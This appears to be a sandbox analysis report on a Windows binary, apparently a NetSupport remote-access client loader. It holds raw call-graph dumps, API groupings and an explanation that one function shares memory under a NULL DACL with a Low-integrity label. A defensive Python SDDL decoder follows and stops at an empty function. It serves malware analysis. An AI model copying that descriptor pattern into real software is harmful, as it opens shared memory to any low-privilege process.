89127->89129 89130 1102f05c 89128->89130 90146 11094f00 105 API calls 89129->90146 89131 1102f073 89130->89131 89132 1102f06a 89130->89132 89500 111464e0 89131->89500 90147 11028360 119 API calls 2 library calls 89132->90147 89135 1102ef9c 89138 11147060 std::locale::facet::_Facet_Register 21 API calls 89135->89138 89136 1102f06f 89136->89131 89140 1102efb0 89138->89140 89139 1102f082 89141 1102f086 89139->89141 89515 1102a6d0 IsJPIK 89139->89515 89142 1102efef CloseHandle FindWindowA 89140->89142 89146 11147060 std::locale::facet::_Facet_Register 21 API calls 89140->89146 89531 11145990 ExpandEnvironmentStringsA 89141->89531 89143 1102f022 89142->89143 89144 1102f014 GetWindowThreadProcessId 89142->89144 89148 11147060 std::locale::facet::_Facet_Register 21 API calls 89143->89148 89144->89143 89147 1102efc2 SendMessageA WaitForSingleObject 89146->89147 89147->89142 89150 1102efe2 89147->89150 89151 1102f02f 89148->89151 89153 11147060 std::locale::facet::_Facet_Register 21 API calls 89150->89153 89151->89119 89155 1102efec 89153->89155 89155->89142 89156 1102f0b5 89157 1102f177 89156->89157 89555 11063880 89156->89555 89570 11027b20 89157->89570 89161 110b7df0 std::locale::facet::_Facet_Register 9 API calls 89164 1102f19c std::locale::facet::_Facet_Register 89176 1102f1b7 89164->89176 89590 1102ad70 89164->89590 89593 110287a0 89176->89593 90215 111457a0 89500->90215 89503 111457a0 std::locale::facet::_Facet_Register 265 API calls 89504 11146517 wsprintfA 89503->89504 89505 11143e00 std::locale::facet::_Facet_Register 8 API calls 89504->89505 89506 11146534 89505->89506 89507 11146560 89506->89507 89509 11143e00 std::locale::facet::_Facet_Register 8 API calls 89506->89509 89508 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 89507->89508 89511 1114656c 89508->89511 89510 11146549 89509->89510 89510->89507 89512 11146550 89510->89512 89511->89139 89513 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 89512->89513 89514 1114655c 
89513->89514 89514->89139 89516 1102a705 89515->89516 89517 1102a7d3 89515->89517 89518 111101b0 std::locale::facet::_Facet_Register 265 API calls 89516->89518 89517->89141 89519 1102a70c 89518->89519 89520 1102a73b 89519->89520 89522 11061aa0 301 API calls 89519->89522 89521 11063880 330 API calls 89520->89521 89523 1102a759 89521->89523 89522->89520 89523->89517 89524 110d1930 268 API calls 89523->89524 89525 1102a765 89524->89525 89526 1102a7c7 89525->89526 89528 1102a798 89525->89528 89527 110d0a10 265 API calls 89526->89527 89527->89517 89529 110d0a10 265 API calls 89528->89529 89530 1102a7a4 89529->89530 89530->89141 89532 111459c7 89531->89532 89533 111459e4 std::locale::facet::_Facet_Register 89532->89533 89534 111459fe 89532->89534 89543 111459d4 89532->89543 89536 111459f5 GetModuleFileNameA 89533->89536 89535 111457a0 std::locale::facet::_Facet_Register 265 API calls 89534->89535 89537 11145a04 89535->89537 89536->89537 89541 11081e00 std::locale::facet::_Facet_Register IsDBCSLeadByte 89537->89541 89538 11142e60 std::locale::facet::_Facet_Register 265 API calls 89539 11145a58 89538->89539 89540 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 89539->89540 89542 1102f0a3 89540->89542 89541->89543 89544 11143e00 89542->89544 89543->89538 89545 11143e21 CreateFileA 89544->89545 89547 11143ebe CloseHandle 89545->89547 89548 11143e9e 89545->89548 89551 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 89547->89551 89549 11143ea2 CreateFileA 89548->89549 89550 11143edb 89548->89550 89549->89547 89549->89550 89553 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 89550->89553 89552 11143ed7 89551->89552 89552->89156 89554 11143eea 89553->89554 89554->89156 89556 1105e820 79 API calls 89555->89556 89557 110638a8 89556->89557 90259 110627b0 89557->90259 89559 1102f0d6 89559->89157 89559->89161 89561 1105e950 5 API calls 89562 11063909 std::locale::facet::_Facet_Register 89561->89562 89563 1105e820 79 API calls 
89562->89563 89571 11061a70 274 API calls 89570->89571 89572 11027b54 89571->89572 89573 1105e820 79 API calls 89572->89573 89575 11027b69 89573->89575 89574 11027bbf LoadIconA 89577 11027bd1 89574->89577 89578 11027bda GetSystemMetrics GetSystemMetrics LoadImageA 89574->89578 89575->89574 89576 11145ef0 std::locale::facet::_Facet_Register 90 API calls 89575->89576 89588 11027c38 89575->89588 89580 11027ba2 LoadLibraryExA 89576->89580 89577->89578 89581 11027c13 89578->89581 89582 11027bff LoadIconA 89578->89582 89579 11027cec 89583 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 89579->89583 89580->89574 89580->89582 89585 11027c17 GetSystemMetrics GetSystemMetrics LoadImageA 89581->89585 89581->89588 89582->89581 89586 11027cf9 89583->89586 89585->89588 89586->89164 89587 11081e70 86 API calls 89587->89588 89588->89579 89588->89587 89589 11145c70 std::locale::facet::_Facet_Register 90 API calls 89588->89589 90865 11061e10 268 API calls 4 library calls 89588->90865 89589->89588 90866 11028c10 89590->90866 89592 1102ad7e 89594 11147060 std::locale::facet::_Facet_Register 21 API calls 89593->89594 89595 110287c6 89594->89595 89596 110288b4 89595->89596 89597 110287dd GetModuleFileNameA 89595->89597 90902 11013dd0 22 API calls 2 library calls 89596->90902 89598 11081e00 std::locale::facet::_Facet_Register IsDBCSLeadByte 89597->89598 89600 11028801 89598->89600 89601 110288c7 90138 11143678 90137->90138 90141 1114363e 90137->90141 90139 11142e60 std::locale::facet::_Facet_Register 265 API calls 90138->90139 90140 11143680 90139->90140 90140->89081 90141->90138 90142 11143662 90141->90142 92305 11142ee0 267 API calls std::locale::facet::_Facet_Register 90142->92305 90144 11143668 90144->89081 90146->89135 90147->89136 90216 111457c2 90215->90216 90220 111457d9 std::locale::facet::_Facet_Register 90215->90220 90257 11029a70 265 API calls 2 library calls 90216->90257 90219 11145967 90221 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 
90219->90221 90220->90219 90222 1114580c GetModuleFileNameA 90220->90222 90223 11145983 wsprintfA 90221->90223 90224 11081e00 std::locale::facet::_Facet_Register IsDBCSLeadByte 90222->90224 90223->89503 90225 11145821 90224->90225 90226 11145831 SHGetFolderPathA 90225->90226 90227 11145918 90225->90227 90228 1114585e 90226->90228 90229 1114587d SHGetFolderPathA 90226->90229 90230 11142e60 std::locale::facet::_Facet_Register 262 API calls 90227->90230 90228->90229 90232 11145864 90228->90232 90233 111458b2 std::locale::facet::_Facet_Register 90229->90233 90230->90219 90258 11029a70 265 API calls 2 library calls 90232->90258 90236 1102ad70 std::locale::facet::_Facet_Register 145 API calls 90233->90236 90237 111458c3 90236->90237 90239 11145240 90237->90239 90240 111452ca 90239->90240 90241 1114524b 90239->90241 90240->90227 90241->90240 90242 1114525b GetFileAttributesA 90241->90242 90243 11145275 90242->90243 90244 11145267 90242->90244 90245 11164bb8 __strdup 66 API calls 90243->90245 90244->90227 90246 1114527c 90245->90246 90247 11081e00 std::locale::facet::_Facet_Register IsDBCSLeadByte 90246->90247 90248 11145286 90247->90248 90249 11145240 std::locale::facet::_Facet_Register 67 API calls 90248->90249 90255 111452a3 90248->90255 90250 11145296 90249->90250 90251 111452ac 90250->90251 90252 1114529e 90250->90252 90254 11163aa5 _free 66 API calls 90251->90254 90253 11163aa5 _free 66 API calls 90252->90253 90253->90255 90256 111452b1 CreateDirectoryA 90254->90256 90255->90227 90256->90255 90380 11145a70 90259->90380 90261 1106283c 90262 110d1930 268 API calls 90261->90262 90263 11062850 90262->90263 90264 11062864 std::ios_base::_Tidy 90263->90264 90265 11062a37 90263->90265 90389 1116535d 90263->90389 90266 11164c77 std::locale::facet::_Facet_Register 102 API calls 90264->90266 90270 110637a8 90264->90270 90267 1116535d _fgets 81 API calls 90265->90267 90266->90270 90271 11062a51 90267->90271 90268 110d0a10 265 API calls 90366 11062931 std::ios_base::_Tidy 
90268->90366 90270->90268 90275 11062a58 90271->90275 90279 11062ab7 _strpbrk 90271->90279 90272 110628e7 90273 110628ee 90272->90273 90287 1106293d _strpbrk std::locale::facet::_Facet_Register 90272->90287 90274 11062923 90273->90274 90444 11164c77 90273->90444 90278 110d0a10 265 API calls 90274->90278 90276 11062a9d 90275->90276 90280 11164c77 std::locale::facet::_Facet_Register 102 API calls 90275->90280 90281 110d0a10 265 API calls 90276->90281 90278->90366 90408 11164536 90279->90408 90280->90276 90281->90366 90283 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 90285 110637df 90283->90285 90285->89559 90285->89561 90285->89562 90288 11163ca7 std::locale::facet::_Facet_Register 79 API calls 90287->90288 90289 110629ad 90288->90289 90366->90283 90386 11145a83 std::ios_base::_Tidy 90380->90386 90381 11145990 267 API calls 90381->90386 90382 11164ead std::locale::facet::_Facet_Register 143 API calls 90382->90386 90383 11145aea std::ios_base::_Tidy 90383->90261 90384 11145aa5 GetLastError 90385 11145ab0 Sleep 90384->90385 90384->90386 90387 11164ead std::locale::facet::_Facet_Register 143 API calls 90385->90387 90386->90381 90386->90382 90386->90383 90386->90384 90388 11145ac2 90387->90388 90388->90383 90388->90386 90390 11165369 __close 90389->90390 90391 1116537c 90390->90391 90392 111653ad 90390->90392 90508 1116a1af 66 API calls __getptd_noexit 90391->90508 90398 1116538c __close 90392->90398 90482 1116be59 90392->90482 90394 11165381 90509 1116edc4 11 API calls __mbschr_l 90394->90509 90398->90272 90402 11165431 90403 1116545e 90402->90403 90488 11172885 90402->90488 90409 1116454f 90408->90409 90410 111642e0 strtoxl 79 API calls 90409->90410 90411 11062ae1 90410->90411 90445 11164c83 __close 90444->90445 90483 1116be8d EnterCriticalSection 90482->90483 90484 1116be6b 90482->90484 90486 111653bb 90483->90486 90484->90483 90485 1116be73 90484->90485 90487 1117459f __lock 66 API calls 90485->90487 90486->90402 90510 1116a147 90486->90510 
90487->90486 90508->90394 90509->90398 90511 1116a153 90510->90511 90512 1116a168 90510->90512 90865->89588 90867 11028c33 90866->90867 90868 1102927b 90866->90868 90869 11028cf0 GetModuleFileNameA 90867->90869 90878 11028c68 90867->90878 90870 11029317 90868->90870 90871 1102932a 90868->90871 90872 11028d11 _strrchr 90869->90872 90873 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 90870->90873 90874 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 90871->90874 90875 11164ead std::locale::facet::_Facet_Register 143 API calls 90872->90875 90876 11029326 90873->90876 90877 1102933b 90874->90877 90879 11028ceb 90875->90879 90876->89592 90877->89592 90878->90878 90881 11164ead std::locale::facet::_Facet_Register 143 API calls 90878->90881 90879->90868 90896 11026ef0 81 API calls 2 library calls 90879->90896 90881->90879 90902->89601 92305->90144 92320 110262f0 92321 110262fe GetProcAddress 92320->92321 92322 1102630f 92320->92322 92321->92322 92323 11026328 92322->92323 92324 1102631c K32GetProcessImageFileNameA 92322->92324 92325 1102632e GetProcAddress 92323->92325 92326 1102633f 92323->92326 92324->92323 92327 11026361 92324->92327 92325->92326 92328 11026346 92326->92328 92329 11026357 SetLastError 92326->92329 92329->92327 92330 1113d980 92331 1113d989 92330->92331 92332 1113d98e 92330->92332 92334 11139ed0 92331->92334 92335 11139f12 92334->92335 92336 11139f07 GetCurrentThreadId 92334->92336 92337 11139f20 92335->92337 92468 11029950 92335->92468 92336->92335 92475 11134830 92337->92475 92343 1113a011 92349 1113a042 FindWindowA 92343->92349 92352 1113a0da 92343->92352 92344 1113a59a 92345 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 92344->92345 92347 1113a5b2 92345->92347 92347->92332 92348 11139f5c IsWindow IsWindowVisible 92350 11147060 std::locale::facet::_Facet_Register 21 API calls 92348->92350 92351 1113a057 IsWindowVisible 92349->92351 92349->92352 92353 11139f87 92350->92353 92351->92352 92354 1113a05e 
92351->92354 92355 1105e820 79 API calls 92352->92355 92365 1113a0ff 92352->92365 92357 1105e820 79 API calls 92353->92357 92354->92352 92358 11139a70 392 API calls 92354->92358 92379 1113a127 92355->92379 92356 1113a2b0 92361 1113a2ca 92356->92361 92362 11139a70 392 API calls 92356->92362 92360 11139fa3 IsWindowVisible 92357->92360 92363 1113a07f IsWindowVisible 92358->92363 92359 1105e820 79 API calls 92366 1113a29f 92359->92366 92360->92343 92367 11139fb1 92360->92367 92364 1113a2e7 92361->92364 92711 1106c340 298 API calls 92361->92711 92362->92361 92363->92352 92368 1113a08e IsIconic 92363->92368 92712 1112ddd0 12 API calls 2 library calls 92364->92712 92365->92356 92365->92359 92366->92356 92371 1113a2a4 92366->92371 92367->92343 92372 11139fb9 92367->92372 92368->92352 92373 1113a09f GetForegroundWindow 92368->92373 92710 1102d750 294 API calls std::locale::facet::_Facet_Register 92371->92710 92376 11147060 std::locale::facet::_Facet_Register 21 API calls 92372->92376 92708 11132120 147 API calls 92373->92708 92374 1113a2ec 92381 1113a2f4 92374->92381 92382 1113a2fd 92374->92382 92377 11139fc3 GetForegroundWindow 92376->92377 92384 11139fd2 EnableWindow 92377->92384 92385 11139ffe 92377->92385 92379->92365 92380 1113a174 92379->92380 92387 11081d30 IsDBCSLeadByte 92379->92387 92389 11143e00 std::locale::facet::_Facet_Register 8 API calls 92380->92389 92713 11132a10 89 API calls 3 library calls 92381->92713 92390 1113a314 92382->92390 92391 1113a308 92382->92391 92383 1113a2ab 92383->92356 92706 11132120 147 API calls 92384->92706 92385->92343 92401 1113a00a SetForegroundWindow 92385->92401 92386 1113a0ae 92709 11132120 147 API calls 92386->92709 92387->92380 92396 1113a186 92389->92396 92715 111326b0 299 API calls std::locale::facet::_Facet_Register 92390->92715 92397 1113a319 92391->92397 92714 11132780 299 API calls std::locale::facet::_Facet_Register 92391->92714 92395 1113a2fa 92395->92382 92403 1113a193 GetLastError 92396->92403 92415 1113a1a1 
92396->92415 92399 1113a312 92397->92399 92400 1113a429 92397->92400 92398 11139fe9 92707 11132120 147 API calls 92398->92707 92399->92397 92406 1113a331 92399->92406 92407 1113a3db 92399->92407 92408 11139600 295 API calls 92400->92408 92401->92343 92402 1113a0b5 92409 1113a0cb EnableWindow 92402->92409 92412 1113a0c4 SetForegroundWindow 92402->92412 92410 11147060 std::locale::facet::_Facet_Register 21 API calls 92403->92410 92406->92400 92417 111101b0 std::locale::facet::_Facet_Register 265 API calls 92406->92417 92407->92400 92723 1103f920 68 API calls 92407->92723 92427 1113a42e 92408->92427 92409->92352 92410->92415 92411 11139ff0 EnableWindow 92411->92385 92412->92409 92413 1113a455 92424 1105e820 79 API calls 92413->92424 92467 1113a57a std::ios_base::_Tidy 92413->92467 92415->92365 92416 1113a1f2 92415->92416 92419 11081d30 IsDBCSLeadByte 92415->92419 92421 11143e00 std::locale::facet::_Facet_Register 8 API calls 92416->92421 92420 1113a352 92417->92420 92418 1113a3ea 92724 1103f960 68 API calls 92418->92724 92419->92416 92425 1113a373 92420->92425 92716 11057eb0 306 API calls std::locale::facet::_Facet_Register 92420->92716 92426 1113a204 92421->92426 92423 1113a3f5 92725 1103f980 68 API calls 92423->92725 92441 1113a485 92424->92441 92717 1110fff0 InterlockedIncrement 92425->92717 92426->92365 92430 1113a20b GetLastError 92426->92430 92427->92413 92622 11142d90 92427->92622 92433 11147060 std::locale::facet::_Facet_Register 21 API calls 92430->92433 92432 1113a400 92726 1103f940 68 API calls 92432->92726 92433->92365 92436 1113a398 92718 1104d790 823 API calls 92436->92718 92438 1113a40b 92727 11110000 InterlockedDecrement 92438->92727 92439 1113a3a3 92719 1104ecd0 823 API calls 92439->92719 92442 1113a4cd 92441->92442 92445 1113a4aa 92441->92445 92446 1113a4d9 GetTickCount 92441->92446 92441->92467 92442->92446 92442->92467 92444 1113a3d9 92444->92400 92448 11147060 std::locale::facet::_Facet_Register 21 API calls 92445->92448 92449 1113a4eb 
92446->92449 92446->92467 92447 1113a3ae 92720 1104ed40 823 API calls 92447->92720 92451 1113a4b5 GetTickCount 92448->92451 92452 11143a50 145 API calls 92449->92452 92451->92467 92454 1113a4f7 92452->92454 92453 1113a3b9 92721 1104d7d0 823 API calls 92453->92721 92455 11147af0 269 API calls 92454->92455 92457 1113a502 92455->92457 92459 11143a50 145 API calls 92457->92459 92458 1113a3c4 92458->92400 92722 110ec320 285 API calls 92458->92722 92460 1113a515 92459->92460 92728 110261a0 LoadLibraryA 92460->92728 92463 1113a522 92463->92463 92729 1112d6e0 GetProcAddress SetLastError 92463->92729 92465 1113a569 92466 1113a573 FreeLibrary 92465->92466 92465->92467 92466->92467 92467->92344 92730 110278b0 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 92468->92730 92470 1102995e 92471 11029973 92470->92471 92731 110278b0 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 92470->92731 92732 11089fe0 269 API calls 2 library calls 92471->92732 92474 1102997e 92474->92337 92476 11134872 92475->92476 92477 11134b94 92475->92477 92479 1105e820 79 API calls 92476->92479 92478 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 92477->92478 92481 11134bac 92478->92481 92480 11134892 92479->92480 92480->92477 92482 1113489a GetLocalTime 92480->92482 92523 11134310 92481->92523 92483 111348d1 LoadLibraryA 92482->92483 92484 111348b0 92482->92484 92733 11009940 LoadLibraryA 92483->92733 92485 11147060 std::locale::facet::_Facet_Register 21 API calls 92484->92485 92487 111348c5 92485->92487 92487->92483 92488 11134925 92734 110161e0 LoadLibraryA 92488->92734 92490 11134930 GetCurrentProcess 92491 11134955 GetProcAddress 92490->92491 92492 1113496d GetProcessHandleCount 92490->92492 92491->92492 92493 11134976 SetLastError 92491->92493 92494 1113497e 92492->92494 92493->92494 92495 111349a2 92494->92495 92496 11134988 GetProcAddress 92494->92496 92498 111349b0 GetProcAddress 92495->92498 92500 111349ca 92495->92500 92496->92495 92497 111349d7 
SetLastError 92496->92497 92497->92498 92499 111349e4 SetLastError 92498->92499 92498->92500 92501 111349ef GetProcAddress 92499->92501 92500->92501 92502 11134a01 K32GetProcessMemoryInfo 92501->92502 92503 11134a0f SetLastError 92501->92503 92504 11134a17 92502->92504 92503->92504 92505 11147060 std::locale::facet::_Facet_Register 21 API calls 92504->92505 92509 11134a8d 92504->92509 92505->92509 92506 11134b6a 92507 11134b7a FreeLibrary 92506->92507 92508 11134b7d 92506->92508 92507->92508 92510 11134b87 FreeLibrary 92508->92510 92511 11134b8a 92508->92511 92509->92506 92513 1105e820 79 API calls 92509->92513 92510->92511 92511->92477 92512 11134b91 FreeLibrary 92511->92512 92512->92477 92514 11134ade 92513->92514 92515 1105e820 79 API calls 92514->92515 92516 11134b06 92515->92516 92517 1105e820 79 API calls 92516->92517 92518 11134b2d 92517->92518 92519 1105e820 79 API calls 92518->92519 92520 11134b54 92519->92520 92520->92506 92521 11134b65 92520->92521 92735 11027de0 265 API calls 2 library calls 92521->92735 92525 1113433d 92523->92525 92524 111347f9 92524->92343 92524->92344 92626 11139a70 92524->92626 92525->92524 92526 110d1930 268 API calls 92525->92526 92527 1113439e 92526->92527 92528 110d1930 268 API calls 92527->92528 92529 111343a9 92528->92529 92530 111343d7 92529->92530 92531 111343ee 92529->92531 92736 11029a70 265 API calls 2 library calls 92530->92736 92533 11147060 std::locale::facet::_Facet_Register 21 API calls 92531->92533 92535 111343fc 92533->92535 92737 110d1530 265 API calls 92535->92737 92623 11142d9a 92622->92623 92625 11142daf 92622->92625 92738 11142400 92623->92738 92625->92413 92629 11139a8d 92626->92629 92682 11139eaf 92626->92682 92627 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 92628 11139ebe 92627->92628 92628->92348 92630 11145c70 std::locale::facet::_Facet_Register 90 API calls 92629->92630 92629->92682 92631 11139acc 92630->92631 92632 1105e820 79 API calls 92631->92632 92631->92682 92633 11139afb 
Execution Graph

The report renders this as a node-and-edge diagram. Only the node labels survived extraction, so the raw edge list is replaced here by the nodes that name an API directly (function address, then the calls the node is labelled with). Nodes labelled only with a call count ("N API calls") are omitted.

Window handling: 11139c40 PostMessageA; 11110000 InterlockedDecrement; 1112da60 SetDlgItemTextA; 11139cea SetWindowTextA; 11139daf, 11139e6c, 11139e7e IsWindowVisible; 11139ddc GetForegroundWindow, IsWindowVisible; 11139df6, 11139e1e, 11139e8b, 11139ea2 EnableWindow; 11139e17 SetForegroundWindow
Registry and locking: 111424b9 RegCloseKey; 11142b33 EnterCriticalSection; 11142b7a LeaveCriticalSection; 1108aa2e DeleteCriticalSection
COM and BSTR handling: 1115c8e0 CoInitializeSecurity, CoCreateInstance; 1115c955 wsprintfW, SysAllocString; 1115ca1a wsprintfW; 1115cac1 SysFreeString; 1115cde4 SetLastError; 11097936 SysAllocString; 110979a0 InterlockedDecrement, SysFreeString
Shutdown path: 11028690, 11059fb0 SetEvent; 1102daa3 Sleep; 1100d620 FreeLibrary; 1100d330 wsprintfA; 1102de97 GetModuleFileNameA, GetFileAttributesA; 11147020 FreeLibrary; 1102e084 ExitWindowsEx, Sleep; 1102e094 ExitWindowsEx; 1102e0ab Sleep; 1102e0c0 ExitProcess
File enumeration: 11081e00 IsDBCSLeadByte; 1102df3e _memset; 1102df58 FindFirstFileA; 1102df78 FindNextFileA; 1102df98 FindClose; 11081605, 1108162a wsprintfA; 110ea8f2 SendMessageTimeoutA
System probing: 110310d5 GetNativeSystemInfo; 110312db GetStockObject, GetObjectA; 1103130a SetErrorMode (x2); 1103139f InterlockedExchange; 110313df GetACP; 11163f93 _sprintf; 111663a3 _setlocale; 11089989, 110899a0 GetParent; 11168154 GetFileAttributesA; 11168162 GetLastError
Loader stub: 3a1020 GetCommandLineA; 3a1035 GetStartupInfoA; 3a1090 GetModuleHandleA; 3a1000 _NSMClient32; 3a10a2 ExitProcess
CRT initialisation (labels __CRT_INIT@12, ___DllMainCRTStartup): 11177f37 GetSystemTimeAsFileTime, GetCurrentProcessId, GetCurrentThreadId, GetTickCount, QueryPerformanceCounter; 1116e390 HeapCreate; 1116e3ae HeapDestroy; 1116c82c GetModuleHandleW; 1116c849 GetProcAddress (x4); 1116c893 TlsAlloc; 1116c8e1 TlsSetValue; 1116c8f7 EncodePointer (x4); 1116a484, 1116c93a, 1116c96d DecodePointer; 11174425, 11172173, 1117222a InitializeCriticalSectionAndSpinCount; 1116c98a GetCurrentThreadId; 11177e54 GetEnvironmentStringsW; 11177e85, 11177eb3 WideCharToMultiByte; 11177ed1, 11177edd FreeEnvironmentStringsW; 11172029 GetStartupInfoW; 11172168, 11172204 GetFileType; 111721f2 GetStdHandle; 11172256 SetHandleCount; 11177db3 GetModuleFileNameA
Single-instance check and plugin loading: 11030ca3 OpenMutexA; 11030cc3 CreateMutexA; 110161e0, 111466c9 LoadLibraryA; 11030d66, 111466db GetProcAddress; 11030d80 SetLastError; 11030db0 WaitForSingleObject; 11030dc2, 11030dda, 1108a9ce CloseHandle; 11030dd3, 111466f3 FreeLibrary
Winsock helper (6f9f0000 module): 6f9f63a9 WSACancelBlockingCall; 6f9f63b1 Sleep

Control-flow Graph

Rendered in the report as a basic-block graph with executed/not-executed colouring; neither the image nor the colouring is recoverable from the extracted text. Basic blocks of function 1109e5b0, in address order, with the calls they contain:

1109e5b0-1109e612 call 1109dda0
1109e618-1109e63b call 1109d860
1109e641-1109e655 LocalAlloc
1109e65b-1109e68d InitializeSecurityDescriptor, SetSecurityDescriptorDacl, GetVersionExA
1109e693-1109e6be call 1109d7d0, call 1109d810
1109e6c0-1109e6f6 GetSecurityDescriptorSacl
1109e6f8-1109e703 SetSecurityDescriptorSacl
1109e713-1109e714 FreeLibrary
1109e736-1109e75b CreateFileMappingA
1109e75d-1109e77d GetLastError, call 110d6c20
1109e77f-1109e786 LocalFree; 1109e792-1109e793 LocalFree
1109e7a8-1109e7bb GetLastError
1109e7c2-1109e7d9 MapViewOfFile
1109e7db-1109e7f6 call 110d6c20; 1109e7f8-1109e7f9 LocalFree; 1109e805-1109e806 LocalFree
1109e825-1109e83e GetModuleFileNameA
1109e899-1109e8bc call 110d6c20, call 1109dce0
1109e8dd-1109e8f8 call 110d6c20; 1109e8fa-1109e8fb LocalFree; 1109e907-1109e908 LocalFree
1109e919-1109e932 call 11162be0, GetTickCount
1109e9bf-1109ea23 GetCurrentProcessId, GetModuleFileNameA, call 1109dc30
1109ea2b-1109ea42 CreateEventA; 1109ea44-1109ea63 GetLastError (x2), call 110d6c20
1109ea76-1109ea87 CreateEventA; 1109ea89-1109eaa8 GetLastError (x2), call 110d6c20
1109eabb-1109eacd CreateEventA; 1109eacf-1109eaee GetLastError (x2), call 110d6c20
1109eb01-1109eb12 CreateEventA; 1109eb14-1109eb31 GetLastError (x2), call 110d6c20
1109eb44-1109eb45 LocalFree; 1109eb51-1109eb52 LocalFree
1109eb83-1109eb89 GetCurrentThreadId
1109eb8c-1109eba8 CreateThread
1109ebc2-1109ebd8 ResetEvent (x3)
1109ebda-1109ec05 SetEvent, call 110d6c20, call 1109d8f0
1109ec07-1109ec19 call 110d6c20
1109ec1e-1109ec20 call 1109dce0
1109ec25-1109ec2b call 1109d8f0
1109ec32-1109ec4d call 11162bb7
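The security descriptor that 1109e5b0 hands to CreateFileMappingA is worth reading closely. SetSecurityDescriptorDacl is called with bDaclPresent = 1 and pDacl = NULL, which installs a NULL DACL (no discretionary access check at all), and the SACL applied afterwards comes from the SDDL string S:(ML;;NW;;;LW): a mandatory label of Low integrity with the no-write-up policy. Together they make the mapping, created with PAGE_READWRITE and mapped with FILE_MAP_ALL_ACCESS, readable and writable by any process running at Low integrity or above. The decoder below is an added example, not code from the report or from the sample; it parses SDDL strings such as the one observed here, expands the aliases, and summarises what the NULL DACL plus label policy allow. It assumes the documented SDDL spelling D:NO_ACCESS_CONTROL as the string form of the NULL DACL that the call sequence installs, and it covers only the common ACE types, rights and SID aliases listed in its tables.

```python
"""Decode the SDDL behind the descriptor 1109e5b0 passes to CreateFileMappingA (added example)."""
import re
from dataclasses import dataclass
from typing import Optional

ACE_TYPES = {"A": "ACCESS_ALLOWED", "D": "ACCESS_DENIED", "OA": "ACCESS_ALLOWED_OBJECT",
             "OD": "ACCESS_DENIED_OBJECT", "AU": "SYSTEM_AUDIT", "AL": "SYSTEM_ALARM",
             "ML": "SYSTEM_MANDATORY_LABEL"}
ACE_FLAGS = {"CI": "CONTAINER_INHERIT", "OI": "OBJECT_INHERIT", "NP": "NO_PROPAGATE_INHERIT",
             "IO": "INHERIT_ONLY", "ID": "INHERITED", "SA": "SUCCESSFUL_ACCESS", "FA": "FAILED_ACCESS"}
RIGHTS = {"GA": "GENERIC_ALL", "GR": "GENERIC_READ", "GW": "GENERIC_WRITE", "GX": "GENERIC_EXECUTE",
          "RC": "READ_CONTROL", "SD": "DELETE", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
          "FA": "FILE_ALL_ACCESS", "FR": "FILE_GENERIC_READ", "FW": "FILE_GENERIC_WRITE",
          "NR": "SYSTEM_MANDATORY_LABEL_NO_READ_UP", "NW": "SYSTEM_MANDATORY_LABEL_NO_WRITE_UP",
          "NX": "SYSTEM_MANDATORY_LABEL_NO_EXECUTE_UP"}
SIDS = {"WD": "S-1-1-0", "AN": "S-1-5-7", "AU": "S-1-5-11", "SY": "S-1-5-18", "BA": "S-1-5-32-544",
        "BU": "S-1-5-32-545", "LW": "S-1-16-4096", "ME": "S-1-16-8192", "MP": "S-1-16-8448",
        "HI": "S-1-16-12288", "SI": "S-1-16-16384"}
INTEGRITY = {"S-1-16-0": "Untrusted", "S-1-16-4096": "Low", "S-1-16-8192": "Medium",
             "S-1-16-8448": "Medium Plus", "S-1-16-12288": "High", "S-1-16-16384": "System"}
ACL_FLAGS = ("NO_ACCESS_CONTROL", "AR", "AI", "P")  # ACL-level flags allowed before the ACEs

# String form of what the sample installs (assumption: SetSecurityDescriptorDacl(sd, TRUE, NULL, FALSE)
# is a NULL DACL, spelled D:NO_ACCESS_CONTROL in SDDL); the SACL is the report's "S:(ML;;NW;;;LW)".
OBSERVED_SDDL = "D:NO_ACCESS_CONTROLS:(ML;;NW;;;LW)"


@dataclass(frozen=True)
class Ace:
    ace_type: str
    flags: tuple
    rights: tuple
    object_type: Optional[str]
    inherited_object_type: Optional[str]
    sid: Optional[str]

def _tokens(field: str, table: dict) -> tuple:
    """Translate a run of two-letter SDDL tokens ("NWNR"); unknown tokens are passed through."""
    if len(field) % 2:
        raise ValueError(f"odd-length token run: {field!r}")
    return tuple(table.get(field[i:i + 2], field[i:i + 2]) for i in range(0, len(field), 2))

def _sid(field: str) -> Optional[str]:
    if field and not field.startswith("S-") and field not in SIDS:
        raise ValueError(f"unknown SID alias: {field!r}")
    return SIDS.get(field, field) or None

def _acl(section: str) -> dict:
    """Parse the text after 'D:' or 'S:': optional ACL flags, then zero or more (...) ACEs."""
    flags, rest = [], section.partition("(")[0]
    while rest:
        tok = next((t for t in ACL_FLAGS if rest.startswith(t)), None)
        if tok is None:
            raise ValueError(f"unknown ACL flag in {rest!r}")
        flags.append(tok)
        rest = rest[len(tok):]
    aces = []
    for body in re.findall(r"\(([^)]*)\)", section):
        t, f, r, og, iog, sid = (body.split(";") + [""] * 6)[:6]
        aces.append(Ace(ACE_TYPES.get(t, t), _tokens(f, ACE_FLAGS), _tokens(r, RIGHTS),
                        og or None, iog or None, _sid(sid)))
    # NO_ACCESS_CONTROL marks a NULL DACL; a "D:" with no ACEs is an empty DACL that denies everyone.
    return {"flags": tuple(flags), "null": "NO_ACCESS_CONTROL" in flags, "aces": aces}

def parse_sddl(sddl: str) -> dict:
    """Split an SDDL string into owner/group SIDs and decoded DACL/SACL."""
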